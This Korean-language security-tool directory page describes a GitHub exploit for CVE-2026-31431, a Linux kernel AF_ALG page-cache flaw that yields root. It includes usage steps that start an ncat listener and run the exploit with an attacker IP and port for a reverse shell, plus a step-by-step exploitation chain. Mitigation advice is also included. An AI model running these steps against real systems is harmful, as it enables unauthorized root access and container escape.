Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-31431-RCE-Exploit — CVE-2026-31431에 대한 로컬 권한 상승 익스플로잇으로, Linux 커널 AF_ALG 로직 결함을 이용해 권한이 없는 사용자가 페이지 캐시에 4바이트를 쓰고 루트 권한을 획득할 수 있게 합니다. PoC 스크립트와 완화 지침을 포함합니다. | Kitploit
도구/GitHubGitHub/m4xsec/cve-2026-31431-rce-exploit
Privilege EscalationExploit FrameworksVulnerability AnalysisExploitationRed TeamingContainer EscapeBinary Exploitation
GitHubm4xsec/cve-2026-31431-rce-exploit

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-31431-RCE-Exploit

CVE-2026-31431에 대한 로컬 권한 상승 익스플로잇으로, Linux 커널 AF_ALG 로직 결함을 이용해 권한이 없는 사용자가 페이지 캐시에 4바이트를 쓰고 루트 권한을 획득할 수 있게 합니다. PoC 스크립트와 완화 지침을 포함합니다.

저장소 보기
72295개월 전아직 검토되지 않음

🔴 CVE-2026-31431 — "Copy Fail"

9년 된 리눅스 커널 로직 버그, 몇 초 만에 루트 권한 획득

CVE CVSS Kernel Since


개요

Copy Fail은 리눅스 커널의 암호화 서브시스템(algif_aead)에서 발견된 고위험 로컬 권한 상승(LPE) 취약점입니다. Theori가 (자사의 Xint Code AI 기반 취약점 연구 도구를 통해) 2026년 4월 29일에 발견하고 공개했으며, 이 결함으로 인해 권한이 없는 로컬 사용자가 읽기 가능한 모든 파일의 페이지 캐시에 4바이트의 제어된 데이터를 쓸 수 있고, 이를 활용해 2017년 이후 출시된 사실상 모든 주요 리눅스 배포판에서 루트 권한을 얻을 수 있습니다.

동작하는 개념 증명 익스플로잇은 단 약 732바이트의 Python 코드입니다.


악용 방법

  1. Ncat 리스너 시작
sudo ncat -lvnp PORT
  1. 대상 머신에서 익스플로잇 실행
# Python 스크립트 사용
python3 CVE-2026-31431-Exploit.py IP PORT

# 컴파일된 바이너리
chmod +x CVE-2026-31431-Exploit
./CVE-2026-31431-Exploit IP PORT

🧬 기술 요약

필드세부 사항
CVE IDCVE-2026-31431
CVSS 점수7.8 (HIGH)
유형로컬 권한 상승 (LPE)
구성 요소algif_aead — 리눅스 커널 AF_ALG 사용자 공간 암호화 인터페이스
근본 원인authencesn AEAD 템플릿의 로직 결함; 인플레이스 최적화(커밋 72548b093ee3, 2017년 8월)로 인해 페이지 캐시 페이지가 커널의 쓰기 가능한 대상 scatterlist에 나타남
프리미티브읽기 가능한 모든 파일의 페이지 캐시에 4바이트 제어된 쓰기
악용 메커니즘AF_ALG 소켓 → splice() → setuid 바이너리의 페이지 캐시 손상 → 루트
경쟁 조건?❌ 없음 — 직선형 로직 결함, 100% 신뢰성
커널 오프셋 필요?❌ 없음
수정 커밋fafe0fa2995a (2017년 최적화를 되돌림)

익스플로잇 작동 방식 (4단계)

  1. 열기 — AF_ALG 소켓을 열고 authencesn(hmac(sha256),cbc(aes))에 바인딩
  2. Splice — 읽기 가능한 setuid 바이너리의 페이지를 소켓으로 splice
  3. 커널의 AEAD 스크래치 쓰기가 해당 바이너리의 페이지 캐시에서 4바이트를 덮어씀
  4. 실행 — 손상된 setuid 바이너리 실행 → 루트 셸

위험한 이유

  • 경쟁 창 없음 — 결정적이며 매번 동작
  • 커널 오프셋 / KASLR 우회 불필요
  • 동일한 익스플로잇이 여러 배포판에서 동작 — Ubuntu, RHEL, Amazon Linux, SUSE, Rocky 등
  • 컨테이너 탈출 — 페이지 캐시는 공유되므로 컨테이너 내부의 쓰기가 호스트에 영향을 미침
  • 디스크 수정 없음 — 파일 무결성 모니터(AIDE, OSSEC 등)가 감지하지 못함
  • 디스크에 포렌식 흔적 없음

🎯 영향받는 버전

영향받는 버전영향받지 않는 버전
리눅스 커널 4.14 ~ 7.0-rc4.14 이전 커널 (2017년 8월 커밋 이전)
6.18.22 이전의 모든 6.18.x6.18.22+ (패치됨)
6.19.12 이전의 모든 6.19.x6.19.12+ (패치됨)

취약한 것으로 확인된 배포판

  • Ubuntu 24.04 LTS
  • Amazon Linux 2023
  • RHEL 10.1
  • SUSE 16
  • Rocky Linux 9.7

사실상 2017년 이후 출시된 모든 주요 리눅스 배포판이 영향을 받습니다.


🛡️ 완화 조치

1. 패치 (권장)

수정 커밋 fafe0fa2995a가 포함된 커널 버전으로 업데이트하세요. 대부분의 주요 배포판에서 업데이트된 커널 패키지를 출시했거나 출시 중입니다.

2. 임시 대응 조치

즉시 패치할 수 없는 경우:

  • seccomp 정책을 통해 AF_ALG 소켓 생성 차단
  • algif_aead 모듈 블랙리스트 등록:
    echo "blacklist algif_aead" | sudo tee /etc/modprobe.d/disable-algif-aead.conf
    sudo modprobe -r algif_aead 2>/dev/null
    

⚠️ 면책 조항

이 저장소는 교육 및 방어 목적으로만 제공됩니다. 여기의 정보는 보안 팀이 CVE-2026-31431을 이해하고, 탐지하고, 완화하는 데 도움을 주기 위한 것입니다. 항상 책임 있는 공개 관행과 적용 법률을 준수하세요.


⭐ 패치 및 탐지 지침에 대한 최신 정보를 받으려면 이 저장소에 별표를 눌러주세요.

도구 다운로드